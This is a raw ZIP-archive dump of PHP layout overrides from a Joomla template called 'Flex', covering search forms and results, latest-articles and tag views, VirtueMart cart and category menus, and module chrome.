$output .= '<input type="text" name="q" id="mod-finder-searchword' . $module->id . '" class="inputbox search-query" size="' . $params->get('field_size', 20) . '" value="' . htmlspecialchars(JFactory::getApplication()->input->get('q', '', 'string'), ENT_COMPAT, 'UTF-8') . '"' . ' placeholder="' . JText::_('MOD_FINDER_SEARCH_VALUE') . '"/>';
if ($params->get('show_button', 0) == 0) {
	$output .= '<input type="submit" class="hidden finder" />';
}
$output .= '</div>';

$showLabel  = $params->get('show_label', 1);
$labelClass = (!$showLabel ? 'element-invisible ' : '') . 'finder' . $suffix;
if ($showLabel) {
	$label = '<label for="mod-finder-searchword' . $module->id . '" class="' . $labelClass . '">' . $params->get('alt_label', JText::_('JSEARCH_FILTER_SUBMIT')) . '</label>';

	switch ($params->get('label_pos', 'left'))
	{
		case 'top' :
			$output = $label . '<br />' . $output;
			break;
	
		case 'bottom' :
			$output .= '<br />' . $label;
			break;
	
		case 'right' :
			$output .= $label;
			break;
	
		case 'left' :
		default :
			$output = $label . $output;
			break;
	}
}

$margin = !$showLabel ? $margin = 'style="margin:10px auto;" ' : $margin = '';
if ($params->get('show_button', 0)) {
	
	$button = '<button class="btn sppb-btn-default btn-block ' . $suffix . ' finder' . $suffix . '" type="submit">' . JText::_('JSEARCH_FILTER_SUBMIT') . '</button>';

	switch ($params->get('button_pos', 'left'))
	{
		case 'top' :
			$output = $button . '<div class="clearfix" style="margin-bottom:-10px;"></div><br />' . $output;
			break;

		case 'bottom' :
			$output .= '<div class="clearfix" style="margin-top:-10px;"></div><br />' . $button;
			break;

		case 'right' :
			$output .= $button;
			break;

		case 'left' :
		default :
			$output = $button . $output;
			break;
	}
}

JHtml::_('stylesheet', 'com_finder/finder.css', array('version' => 'auto', 'relative' => true));

$script = "
jQuery(document).ready(function() {
	var value, searchword = jQuery('#mod-finder-searchword" . $module->id . "');

		// Get the current value.
		value = searchword.val();

		// If the current value equals the default value, clear it.
		searchword.on('focus', function ()
		{
			var el = jQuery(this);

			if (el.val() === '" . JText::_('MOD_FINDER_SEARCH_VALUE', true) . "')
			{
				el.val('');
			}
		});

		// If the current value is empty, set the previous value.
		searchword.on('blur', function ()
		{
			var el = jQuery(this);

			if (!el.val())
			{
				el.val(value);
			}
		});

		jQuery('#mod-finder-searchform" . $module->id . "').on('submit', function (e)
		{
			e.stopPropagation();
			var advanced = jQuery('#mod-finder-advanced" . $module->id . "');

			// Disable select boxes with no value selected.
			if (advanced.length)
			{
				advanced.find('select').each(function (index, el)
				{
					var el = jQuery(el);

					if (!el.val())
					{
						el.attr('disabled', 'disabled');
					}
				});
			}
		});";
/*
 * This segment of code sets up the autocompleter.
 */
if ($params->get('show_autosuggest', 1))
{
	JHtml::_('script', 'jui/jquery.autocomplete.min.js', array('version' => 'auto', 'relative' => true));

	$script .= "
	var suggest = jQuery('#mod-finder-searchword" . $module->id . "').autocomplete({
		serviceUrl: '" . JRoute::_('index.php?option=com_finder&task=suggestions.suggest&format=json&tmpl=component') . "',
		paramName: 'q',
		minChars: 1,
		maxHeight: 400,
		width: 300,
		zIndex: 9999,
		deferRequestBy: 500
	});";
}

$script .= '});';

JFactory::getDocument()->addScriptDeclaration($script);
?>
<div class="finder<?php echo $suffix; ?>">
	<form id="mod-finder-searchform<?php echo $module->id; ?>" action="<?php echo JRoute::_($route); ?>" method="get" class="form-search" role="search">
		<?php
		// Show the form fields.
		echo $output;
		?>
		<?php $show_advanced = $params->get('show_advanced', 0); ?>
		<?php if ($show_advanced == 2) : ?>
			<div class="clearfix" style="margin-top:-10px;"></div><br />
			<a class="btn-block" href="<?php echo JRoute::_($route); ?>"><?php echo JText::_('COM_FINDER_ADVANCED_SEARCH'); ?></a>
		<?php elseif ($show_advanced == 1) : ?>
			<div style="margin:15px auto;" class="mod-finder-advanced clearfix" id="mod-finder-advanced<?php echo $module->id; ?>">
				<?php echo JHtml::_('filter.select', $query, $params); ?>
			</div>
		<?php endif; ?>
		<?php echo modFinderHelper::getGetFields($route, (int) $params->get('set_itemid', 0)); ?>
	</form>
</div>
PK!�҆n��)flex/html/mod_articles_latest/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_articles_latest
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$has_lazyload = $tpl_params->get('lazyload', 1);

?>
<div class="latest-articles<?php echo $moduleclass_sfx; ?>">
<?php foreach ($list as $item) {

	$attrbs = json_decode($item->attribs);
	$images = json_decode($item->images);
	$thumb_image = '';
	
	
	if(isset($images->image_intro) && !empty($images->image_intro)) {
		if(isset($attrbs->spfeatured_image) && !empty($attrbs->spfeatured_image)) {
			$thumb_image = $attrbs->spfeatured_image;
		} else {
			$thumb_image = $images->image_intro;
		}
	
	} elseif(isset($attrbs->spfeatured_image) && !empty($attrbs->spfeatured_image)) {

		$thumb_image = $attrbs->spfeatured_image;
			
	} 
	
?>
	<div itemscope itemtype="http://schema.org/Article">
		<a href="<?php echo $item->link; ?>" class="latest-news-title" itemprop="url">
			<?php if (!empty($thumb_image)) {?>
                <span class="img-responsive article-list-img">
                    <span class="overlay"></span>
                    <?php 
					if(strpos($thumb_image, 'http://') !== false || strpos($thumb_image, 'https://') !== false){
						if($has_lazyload) { ?>
                        	<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $thumb_image; ?>" alt="<?php echo $item->title; ?>" data-expand="-20">
                    	<?php } else { ?>
                        	<img src="<?php echo $thumb_image; ?>" alt="<?php echo $item->title; ?>">
                        <?php } 
						} else { 
                        if($has_lazyload) { ?>
                        	<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $thumb_image; ?>" alt="<?php echo $item->title; ?>" data-expand="-20">
                    	<?php } else { ?>
                        	<img src="<?php echo $thumb_image; ?>" alt="<?php echo $item->title; ?>">
                        <?php }
						} ?>  
                </span>
                <span class="latest-articles-title" itemprop="name">
					<?php echo $item->title; ?>
				</span>
            <?php } else { ?>
               <span class="date">
               <small data-toggle="tooltip"><?php echo JHtml::_('date', $item->created, JText::_('m / d')); ?></small>
               <span class="year"><?php echo JHtml::_('date', $item->created, JText::_('Y')); ?></span>
               </span>
               
				<span class="latest-articles-title" itemprop="name">
					<?php echo $item->title; ?>
				</span>
			<?php } ?>
		</a>
        <div class="clearfix"></div>
	</div>
<?php } ?>
</div><div class="clearfix"></div>
PK!�9����,flex/html/com_search/search/default_form.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_search
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('bootstrap.tooltip');

$lang = JFactory::getLanguage();
$upper_limit = $lang->getUpperLimitSearchWord();
?>
<form id="searchForm" action="<?php echo JRoute::_('index.php?option=com_search');?>" method="post">

	<div class="btn-toolbar">
		<div class="btn-group pull-left">
			<input type="text" name="searchword" placeholder="<?php echo JText::_('COM_SEARCH_SEARCH_KEYWORD'); ?>" id="search-searchword" size="30" maxlength="<?php echo $upper_limit; ?>" value="<?php echo $this->escape($this->origkeyword); ?>" class="inputbox" />
		</div>
		<div class="btn-group pull-left">
			<button name="Search" onclick="this.form.submit()" class="btn hasTooltip" title="<?php echo JHtml::tooltipText('COM_SEARCH_SEARCH');?>"><i class="fas fa-search"></i></button>
		</div>
		<input type="hidden" name="task" value="search" />
		<div class="clearfix"></div>
	</div>

	<div class="searchintro<?php echo $this->params->get('pageclass_sfx'); ?>">
		<?php if (!empty($this->searchword)):?>
		<p><?php echo JText::plural('COM_SEARCH_SEARCH_KEYWORD_N_RESULTS', '<span class="badge badge-info">' . $this->total . '</span>');?></p>
		<?php endif;?>
	</div>


</form>
PK!E�CA��/flex/html/com_search/search/default_results.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_search
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<dl class="search-results<?php echo $this->pageclass_sfx; ?>">
<?php foreach ($this->results as $result) : ?>
	<dt class="result-title">
		<?php echo $this->pagination->limitstart + $result->count . '. ';?>
		<?php if ($result->href) :?>
			<a href="<?php echo JRoute::_($result->href); ?>"<?php if ($result->browsernav == 1) : ?> target="_blank"<?php endif; ?>>
				<?php echo $result->title; ?>
			</a><i class="fas fa-link"></i>
		<?php else:?>
            <?php echo $result->title; ?>
		<?php endif; ?>
	</dt>
	<?php if ($result->section) : ?>
		<dd class="result-category">
			<span class="small<?php echo $this->pageclass_sfx; ?>">
				<span style="color:#ccc;">/</span> <?php echo $this->escape($result->section); ?> <span style="color:#ccc;">/</span>
			</span>
		</dd>
	<?php endif; ?>
	<dd class="result-text">
		<?php echo $result->text; ?>
	</dd>
	<?php if ($this->params->get('show_date')) : ?>
		<dd class="result-created<?php echo $this->pageclass_sfx; ?>">
			<i class="pe-7s-pen"></i> <?php echo JText::sprintf('JGLOBAL_CREATED_DATE_ON', $result->created); ?>
		</dd>
	<?php endif; ?>
<?php endforeach; ?>
</dl>

<div class="pagination">
	<?php echo $this->pagination->getPagesLinks(); ?>
</div>
PK!���ee'flex/html/com_search/search/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_search
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
?>

<div class="search<?php echo $this->pageclass_sfx; ?>">
<?php if ($this->params->get('show_page_heading', 1)) : ?>
<h1 class="page-title">
	<?php if ($this->escape($this->params->get('page_heading'))) :?>
		<?php echo $this->escape($this->params->get('page_heading')); ?>
	<?php else : ?>
		<?php echo $this->escape($this->params->get('page_title')); ?>
	<?php endif; ?>
</h1>
<?php endif; ?>

<?php echo $this->loadTemplate('form'); ?>
<?php if ($this->error == null && count($this->results) > 0) :
	echo $this->loadTemplate('results');
else :
	echo $this->loadTemplate('error');
endif; ?>
</div>
PK!P�e4bb flex/html/mod_search/default.phpnu&1i�<?php

defined('_JEXEC') or die;
?>
<div class="search<?php echo $moduleclass_sfx ?> flex-search">
	<form action="<?php echo JRoute::_('index.php');?>" method="post">
		<?php
			$output = '';
			$output .= '<input name="searchword" id="mod-search-searchword" maxlength="' . $maxlength . '"  class="inputbox search-query" type="text" size="' . $width . '" placeholder="' . $text . '" />';
			echo $output;
		?>
		<input type="hidden" name="task" value="search" />
		<input type="hidden" name="option" value="com_search" />
		<input type="hidden" name="Itemid" value="<?php echo $mitemid; ?>" />
	</form>
</div>
PK!%=Ή	�	"flex/html/mod_search/topsearch.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2016 Aplikko
*/
// no direct access
defined('_JEXEC') or die;
?>

<div style="display:inline-block;" class="top-search-wrapper">

	<div class="icon-top-wrapper">
		<!-- 
        <i class="fa fa-search search-open-icon" aria-hidden="true"></i>
		<i class="fa fa-times search-close-icon" aria-hidden="true"></i> 
        -->
        <i class="pe pe-7s-search search-open-icon" aria-hidden="true"></i>
		<i class="pe pe-7s-close search-close-icon" aria-hidden="true"></i>
	</div>

	<div class="row top-search-input-wrap" id="top-search-input-wrap">
		<div class="top-search-wrap">
			<div class="searchwrapper">
				<form action="<?php echo JRoute::_('index.php');?>" method="post">
					<div class="search<?php echo $moduleclass_sfx ?>">
						<?php
							$output = '<div class="top-search-wrapper"><div class="sp_search_input"><input name="searchword" maxlength="'.$maxlength.'"  class="mod-search-searchword inputbox'.$moduleclass_sfx.'" type="text" size="'.$width.'" value="'.$text.'"  onblur="if (this.value==\'\') this.value=\''.$text.'\';" onfocus="if (this.value==\''.$text.'\') this.value=\'\';" /></div></div>';

							if ($button) :
								if ($imagebutton) :
									$button = '<input type="image" value="'.$button_text.'" class="button'.$moduleclass_sfx.'" src="'.$img.'" onclick="this.form.searchword.focus();"/>';
								else :
									$button = '<input type="submit" value="'.$button_text.'" class="button'.$moduleclass_sfx.'" onclick="this.form.searchword.focus();"/>';
								endif;
							endif;

							switch ($button_pos) :
								case 'top' :
									$button = $button.'<br />';
									$output = $button;
									break;

								case 'bottom' :
									$button = '<br />'.$button;
									$output = $output;
									break;

								case 'right' :
									$output = $output;
									break;

								case 'left' :
								default :
									$output = $button;
									break;
							endswitch;

							echo $output;
						?>
						<input type="hidden" name="task" value="search" />
						<input type="hidden" name="option" value="com_search" />
						<input type="hidden" name="Itemid" value="<?php echo $mitemid; ?>" />
					</div>
				</form>
			</div> <!-- /.searchwrapper -->
		</div> <!-- /.col-sm-6 -->
	</div> <!-- /.row -->
</div> <!-- /.top-search-wrapper -->	PK!�`���)flex/html/mod_virtuemart_cart/default.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access');

	if ((int) $data->totalProductTxt == 0) {
		$basket = 'total_products empty_basket';
		$empty_cart = 'EMPTY CART';
	} else {
		$basket = 'total_products items-added';
		$empty_cart = '';
	}
	//Add js and css files
	$doc = JFactory::getDocument();
	$doc->addScript( JURI::root(true) . '/templates/flex/js/vm-cart.js' );
?>
                
<!-- Virtuemart 2 Ajax Card -->
<div class="vmCartModule <?php echo $params->get('moduleclass_sfx'); ?>" id="vmCartModule<?php echo $params->get('moduleid_sfx'); ?>" >
    
       <div id="cart-menu">
        <a id="cd-menu-trigger" href="#0" class="cd-cart">
        <i class="pe pe-7s-cart"></i>
            <?php if ((int) $data->totalProduct == 0) { ?>
                <div class="<?php echo $basket; ?>">0</div>
            <?php } else { ?>
               <div class="<?php echo $basket; ?>"><?php echo $data->totalProductTxt; ?></div>
            <?php } ?>
        </a>
    </div>
    
	<nav id="cd-lateral-nav">
		<div class="cd-navigation">
		   
          <h5 style="text-align:center;"><?php echo vmText::_('VM_RECENTLY_ADDED_ITEMS') ?></h5><hr />
      
<?php if ($show_product_list) { ?>
	<div id="hiddencontainer" class="hiddencontainer" style="display:none;">
		<div class="vmcontainer">
			<div class="product_row">
				<div class="quantity"></div>
                <div class="image cart-image pull-left"></div>                
                <div class="cart-item">
                   <div class="product_name"></div>
					<?php if ($show_price and $currencyDisplay->_priceConfig['salesPrice'][0]) { ?>
                        <div class="subtotal_with_tax"></div>  
                    <?php } ?>
                    <div class="customProductData"></div>                    
                  </div>  
               <hr style="width:100%;clear:both;" /> 
			</div>
		</div>
	</div>
	<div class="vm_cart_products">
		<div class="vmcontainer">

			<?php foreach ($data->products as $product){ ?>  
          
           		 <div class="cd-single-item">   
                    <div class="quantity"><?php echo $product['quantity'] ?></div>
					<div class="image cart-image pull-left">
						<?php echo $product["image"]; ?>
                    </div>
                    <div class="cart-item">
                        <div class="product_name"><?php echo $product['product_name'] ?></div>                
						<?php if ($show_price and $currencyDisplay->_priceConfig['salesPrice'][0]) { ?>
                          <div class="subtotal_with_tax"><?php echo $product['subtotal_with_tax'] ?></div>
                        <?php } ?>
                        <?php if ( !empty($product['customProductData']) ) { ?>
                            <div class="customProductData"><?php echo $product['customProductData'] ?></div>
                        <?php } ?>
                	</div>
                  <hr style="width:100%;clear:both;display:block;" />
                </div>
                
			<?php } ?>
   
         <?php if(empty($data->products)){ ?>
            <div class="empty_cart"><h3><?php echo vmText::_('VM_EMPTY_CART'); ?></h3>
            <i class="pe pe-7s-cart">
            <span class="fas fa-ban"></span>
            </i>
            </div>
          <?php } ?>   
          
     </div>    
	</div>
<?php } ?>

        <div class="total">
            <?php if ($data->totalProduct and $show_price and $currencyDisplay->_priceConfig['salesPrice'][0]) { ?>
            <?php echo $data->billTotal; ?>
            <?php } ?>
        </div>

        <div style="clear:both;display:block;" class="show_cart">
            <?php if ($data->totalProduct) echo $data->cart_show; ?>
        </div>
        
		</div>
	</nav>
<?php
$view = vRequest::getCmd('view');
if($view!='cart' and $view!='user'){
	?><div class="payments-signin-button" ></div><?php
}
?>
<noscript>
<?php echo vmText::_('MOD_VIRTUEMART_CART_AJAX_CART_PLZ_JAVASCRIPT') ?>
</noscript>
</div>
PK!�C
!��)flex/html/mod_virtuemart_category/all.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access');
?>

<ul class="accordion-menu VMmenu<?php echo $class_sfx ?>" >
<?php foreach ($categories as $category) {
		$active_menu = '';
		$active_child = '';
		$active_collapse = '';
		$collapsed = ' collapsed';
		$caturl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$category->virtuemart_category_id);
		$cattext = $category->category_name. ' <span class="nmb_products">'.$categoryModel->countProducts($category->virtuemart_category_id ).'</span>';
	
	if (in_array( $category->virtuemart_category_id, $parentCategories)) {
		foreach ($category->childs as $children) { 
			if ($children->virtuemart_category_id == $active_category_id) {
				$active_child = ' deeper';
			}
		}  
		$active_collapse = ' in'; 
		$active_menu = ' class="active'.$active_child.'"';
		$collapsed = '';
	} ?>

<li<?php echo $active_menu; ?>><?php echo JHTML::link($caturl, $cattext); ?>
	
	<?php if ($category->childs ) { ?>	
    <span class="vmmenu-toggler<?php echo $collapsed; ?>" data-toggle="collapse" data-target="#collapse-vmmenu-<?php echo $category->virtuemart_category_id; ?>"><i class="open-icon fa fa-angle-down"></i></span>
    
    <ul class="collapse<?php echo $active_collapse . $class_sfx; ?>" id="collapse-vmmenu-<?php echo $category->virtuemart_category_id; ?>">
        <?php foreach ($category->childs as $child) {
			$active_child_menu = '';
            $catchildurl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$child->virtuemart_category_id);
            $catchildtext = $child->category_name. '<span class="nmb_products">'.$categoryModel->countProducts($child->virtuemart_category_id ).'</span>'; 
			 if ($child->virtuemart_category_id == $active_category_id) $active_child_menu = ' class="active current"'; 
			 ?>
        <li<?php echo $active_child_menu; ?>><?php echo JHTML::link($catchildurl, $catchildtext); ?></li>
        <?php } ?>
    </ul>
    <?php } ?>
</li>
<?php } ?>
</ul>
PK!`�����-flex/html/mod_virtuemart_category/default.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access');

/* ID for jQuery dropdown */
$ID = str_replace('.', '_', substr(microtime(true), -8, 8));
?>
<ul class="accordion-menu VMmenu<?php echo $class_sfx ?>" id="<?php echo "VMmenu".$ID ?>">


<?php foreach ($categories as $category) {
		$active_menu = '';
		//$active_child = '';
		$active_collapse = '';
		$collapsed = ' collapsed';
		$caturl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$category->virtuemart_category_id);
		if (($categoryModel->countProducts($category->virtuemart_category_id ) != 0 )) {
			$cattext = $category->category_name. ' <span class="nmb_products">'.$categoryModel->countProducts($category->virtuemart_category_id ).'</span>';
		} else {
			$cattext = $category->category_name;
		}
		if (in_array( $category->virtuemart_category_id, $parentCategories)) {
			/*
			foreach ($category as $deeper) { 
				if ($deeper->virtuemart_category_id == $active_category_id) {
					$active_child = ' deeper';
				}
			} 
			*/ 
			$active_collapse = ' in'; 
			$active_menu = ' class="active"';
			$collapsed = '';
		} 
?>
<li<?php echo $active_menu; ?>><?php echo JHTML::link($caturl, $cattext);

	if (!empty($category->childs)) { ?>
    	<span class="vmmenu-toggler<?php echo $collapsed; ?>" data-toggle="collapse" data-target="#collapse-vmmenu-<?php echo $category->virtuemart_category_id; ?>"><i class="open-icon fas fa-angle-down"></i></span>
	<?php } ?>
            	
    <?php if (!empty($category->childs)) { ?>
        <ul class="collapse<?php echo $active_collapse . $class_sfx; ?>" id="collapse-vmmenu-<?php echo $category->virtuemart_category_id; ?>">
        
			 <?php foreach ($category->childs as $child) { 
			 
			 	$active_menu = '';
				//$active_child = '';
				$active_collapse1 = '';
				$collapsed1 = ' collapsed';
				
                $active_child_menu = '';
                $catchildurl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$child->virtuemart_category_id);
                if (($categoryModel->countProducts($child->virtuemart_category_id ) != 0 )) {
                    $catchildtext = $child->category_name. '<span class="nmb_products">'.$categoryModel->countProducts($child->virtuemart_category_id ).'</span>';
                } else {
                    $catchildtext = $child->category_name;
                }
                if ($child->virtuemart_category_id == $active_category_id) {
					//$active_child = ' deeper';
					$active_child_menu = ' class="active"';
				}
				
				if (in_array( $child->virtuemart_category_id, $parentCategories)) {
					$active_collapse1 = ' in'; 
					$collapsed1 = '';
				}
				
                ?>
                
                <li<?php echo $active_child_menu; ?>><?php echo JHTML::link($catchildurl, $catchildtext); 
					if (!empty($category->childs)) { ?>
						<span class="vmmenu-toggler<?php echo $collapsed1; ?>" data-toggle="collapse" data-target="#collapse-childmenu-<?php echo $child->virtuemart_category_id; ?>"><i class="open-icon fas fa-angle-down"></i></span>
					<?php } ?>
				</li>
                
				<?php if(!empty($child->childs)){ ?>
                    <ul class="collapse<?php echo $active_collapse1 . $class_sfx; ?>" id="collapse-childmenu-<?php echo $child->virtuemart_category_id; ?>">
						<?php
						foreach ($child->childs as $child1) {
							
							$caturl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$child1->virtuemart_category_id);
							if (($categoryModel->countProducts($child1->virtuemart_category_id ) != 0 )) {
								$cattext = vmText::_($child1->category_name). '<span class="nmb_products">'.$categoryModel->countProducts($child1->virtuemart_category_id ).'</span>';
							} else {
								$cattext = vmText::_($child1->category_name);
							}
							
							if ($child1->virtuemart_category_id == $active_category_id) {
								$active_child_submenu = ' class="active"';
								$collapsed = '';
							} 
							?>
							<li<?php echo $active_child_submenu; ?>>
								<?php echo JHTML::link($caturl, $cattext); ?>
							</li>
							<?php
						} ?>
					</ul>
				<?php }
			} ?>
        </ul>
	<?php } ?>
</li>
<?php } ?>
</ul>
PK!�b͎�-flex/html/mod_virtuemart_category/current.phpnu&1i�<?php // no direct access
defined('_JEXEC') or die('Restricted access');

$ID = str_replace('.', '_', substr(microtime(true), -8, 8));
?>

<ul class="accordion-menu VMmenu<?php echo $class_sfx ?>" id="<?php echo "VMmenu".$ID ?>" >
<?php foreach ($categories as $category) {
		$active_menu = '';
		$active_child = '';
		$active_collapse = '';
		$collapsed = ' collapsed';
		$caturl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$category->virtuemart_category_id);
		$cattext = $category->category_name. ' <span class="nmb_products">'.$categoryModel->countProducts($category->virtuemart_category_id ).'</span>';
		if (in_array( $category->virtuemart_category_id, $parentCategories)) {
			foreach ($category->childs as $children) { 
				if ($children->virtuemart_category_id == $active_category_id) {
					$active_child = ' deeper';
				}
			}  
			$active_collapse = ' in'; 
			$active_menu = ' class="active'.$active_child.'"';
			$collapsed = '';
		} 
?>
<li<?php echo $active_menu; ?>><?php echo JHTML::link($caturl, $cattext);
		if ($category->childs) { ?>
			<span class="vmmenu-toggler<?php echo $collapsed; ?>" data-toggle="collapse" data-target="#collapse-vmmenu-<?php echo $category->virtuemart_category_id; ?>"><i class="open-icon fa fa-angle-down"></i></span>
		<ul class="collapse<?php echo $active_collapse . $class_sfx; ?>" id="collapse-vmmenu-<?php echo $category->virtuemart_category_id; ?>">
		<?php foreach ($category->childs as $child) {
    
                $active_child_menu = '';
                $catchildurl = JRoute::_('index.php?option=com_virtuemart&view=category&virtuemart_category_id='.$child->virtuemart_category_id);
                $catchildtext = $child->category_name. '<span class="nmb_products">'.$categoryModel->countProducts($child->virtuemart_category_id ).'</span>';
                if ($child->virtuemart_category_id == $active_category_id) $active_child_menu = ' class="active current"';
                ?>
                <li<?php echo $active_child_menu; ?>><?php echo JHTML::link($catchildurl, $catchildtext); ?></li>
                <?php } ?>
        </ul>
        <?php } ?>
      <?php } ?>
	</li>
</ul>
PK!�BG���flex/html/modules.phpnu&1i�<?php
/**
 * Flex @package Helix3 Framework
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('resticted access');

function modChrome_sp_xhtml($module, $params, $attribs) {

	$moduleTag     = htmlspecialchars($params->get('module_tag', 'div'), ENT_QUOTES, 'UTF-8');
	$bootstrapSize = (int) $params->get('bootstrap_size', 0);
	$moduleClass   = $bootstrapSize !== 0 ? ' col-sm-' . $bootstrapSize : '';
	$headerTag     = htmlspecialchars($params->get('header_tag', 'h3'), ENT_QUOTES, 'UTF-8');
	$headerClass   = htmlspecialchars($params->get('header_class', 'sp-module-title'), ENT_COMPAT, 'UTF-8');
	
	if ($module->content) {
		echo '<' . $moduleTag . ' class="sp-module ' . htmlspecialchars($params->get('moduleclass_sfx'), ENT_COMPAT, 'UTF-8') . $moduleClass . '">';
			if ($module->showtitle)
			{
				echo '<' . $headerTag . ' class="' . $headerClass . '">' . $module->title . '<div class="divider"></div></' . $headerTag . '><div class="divider"></div>';
			}
			echo '<div class="sp-module-content">';
			echo $module->content;
			echo '</div>';
		echo '</' . $moduleTag . '>';
	}
}PK!v��M'flex/html/mod_sppagebuilder/default.phpnu&1i�<?php
/**
 * @package SP Page Builder
 * @author JoomShaper http://www.joomshaper.com
 * @copyright Copyright (c) 2010 - 2020 JoomShaper
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted access');

require_once JPATH_ROOT .'/components/com_sppagebuilder/parser/addon-parser.php';
JHtml::_('jquery.framework'); // make sure jQuery is loaded before scripts. Important fix.
$doc = JFactory::getDocument();
$input = JFactory::getApplication()->input;
/* No need to load FontAwesome twice, when it is loaded via template 
$sppb_param = JComponentHelper::getParams('com_sppagebuilder');
if ($sppb_param->get('fontawesome',1)) {
	$doc->addStyleSheet(JURI::base(true) . '/components/com_sppagebuilder/assets/css/font-awesome-5.min.css');
	$doc->addStyleSheet(JUri::base(true) . '/components/com_sppagebuilder/assets/css/font-awesome-v4-shims.css');
}
*/
$doc->addStyleSheet(JUri::base(true).'/components/com_sppagebuilder/assets/css/animate.min.css');
$doc->addStyleSheet(JUri::base(true).'/components/com_sppagebuilder/assets/css/sppagebuilder.css');
$doc->addScript(JUri::base(true).'/components/com_sppagebuilder/assets/js/jquery.parallax.js');
$doc->addScript(JUri::base(true).'/components/com_sppagebuilder/assets/js/sppagebuilder.js');
?>
<div class="mod-sppagebuilder <?php echo $moduleclass_sfx ?> sp-page-builder" data-module_id="<?php echo $module->id; ?>">
	<div class="page-content">
		<?php echo AddonParser::viewAddons(json_decode($data), true, 'module' );?>
	</div>
</div>
PK!��1�KK"flex/html/com_tags/tag/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_tags
 *
 * @copyright   Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

// Include template's params
$tpl_params 	= JFactory::getApplication()->getTemplate(true)->params;
$has_lazyload = $tpl_params->get('lazyload', 1);

// Note that there are certain parts of this layout used only when there is exactly one tag.
JHtml::addIncludePath(JPATH_COMPONENT . '/helpers');
$isSingleTag = (count($this->item) == 1);
?>
<div class="tag-category<?php echo $this->pageclass_sfx; ?>">
	<?php if ($this->params->get('show_page_heading')) : ?>
		<h1>
			<?php echo $this->escape($this->params->get('page_heading')); ?>
		</h1>
	<?php endif; ?>
	<?php if ($this->params->get('show_tag_title', 1)) : ?>
		<h2>
			<?php echo JHtml::_('content.prepare', $this->tags_title, '', 'com_tag.tag'); ?>
		</h2>
	<?php endif; ?>
	<?php // We only show a tag description if there is a single tag. ?>
	<?php if (count($this->item) == 1 && (($this->params->get('tag_list_show_tag_image', 1)) || $this->params->get('tag_list_show_tag_description', 1))) : ?>
		<div class="category-desc">
			<?php $images = json_decode($this->item[0]->images); ?>
			<?php if ($this->params->get('tag_list_show_tag_image', 1) == 1 && !empty($images->image_fulltext)) : ?>
            	<?php 
				if(strpos($images->image_fulltext, 'http://') !== false || strpos($images->image_fulltext, 'https://') !== false){
					if($has_lazyload) { ?>
						<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo $images->image_fulltext; ?>" alt="<?php echo JHtml::_('content.prepare', $this->tags_title, '', 'com_tag.tag'); ?>" data-expand="-10">
					<?php } else { ?>
						<img src="<?php echo htmlspecialchars($images->image_fulltext); ?>">
					<?php } 
					} else { 
					if($has_lazyload) { ?>
						<img class="lazyload" src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" data-src="<?php echo JUri::root() . $images->image_fulltext; ?>" alt="<?php echo JHtml::_('content.prepare', $this->tags_title, '', 'com_tag.tag'); ?>" data-expand="-10">
					<?php } else { ?>
						<img src="<?php echo htmlspecialchars($images->image_fulltext); ?>" alt="<?php echo JHtml::_('content.prepare', $this->tags_title, '', 'com_tag.tag'); ?>">
					<?php }
				} ?>
			<?php endif; ?>
			<?php if ($this->params->get('tag_list_show_tag_description') == 1 && $this->item[0]->description) : ?>
				<?php echo JHtml::_('content.prepare', $this->item[0]->description, '', 'com_tags.tag'); ?>
			<?php endif; ?>
			<div class="clr"></div>
		</div>
	<?php endif; ?>
	<?php // If there are multiple tags and a description or image has been supplied use that. ?>
	<?php if ($this->params->get('tag_list_show_tag_description', 1) || $this->params->get('show_description_image', 1)): ?>
